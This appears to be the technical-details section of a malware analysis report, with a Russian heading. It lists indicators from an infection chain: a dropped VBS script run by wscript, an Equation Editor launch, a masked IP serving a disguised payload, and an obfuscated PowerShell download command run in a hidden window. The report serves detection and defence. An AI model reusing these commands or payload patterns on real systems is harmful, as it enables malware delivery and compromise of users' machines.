Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\swwiamagoodchocolatebuoys.vBS"
- %APPDATA%\swwiamagoodchocolatebuoys.vbs
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\i3nmat9z\config14[1].txt
- '19#.#.101.150':80
- 'ia#####4.us.archive.org':443
- http://19#.#.101.150/24/swwiamagoodchocolatebuoyssee.tIF
- 'ia#####4.us.archive.org':443
- DNS ASK ia#####4.us.archive.org
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J⍊ ㏋ ㍮ ⮠ ㉂Bp⍊ ㏋ ㍮ ⮠ ㉂G0⍊ ㏋ ㍮ ⮠ ㉂YQBn⍊ ㏋ ㍮ ⮠ ㉂GU⍊ ㏋ ㍮ ⮠ ㉂VQBy⍊ ㏋ ㍮ ⮠ ㉂Gw⍊ ㏋ ㍮ ⮠ ㉂I⍊ ㏋ ㍮ ⮠ ㉂⍊ ㏋ ㍮ ⮠ ㉂9⍊ ㏋ ㍮ ⮠ ㉂C⍊ ㏋ ㍮ ⮠ ㉂⍊ ㏋ ㍮ ⮠ ㉂JwBo⍊ ㏋ ㍮ ⮠ ㉂HQ⍊ ㏋ ㍮ ⮠ ㉂d⍊ ㏋ ㍮ ⮠ ㉂Bw⍊ ㏋ ㍮ ⮠ ㉂... (со скрытым окном)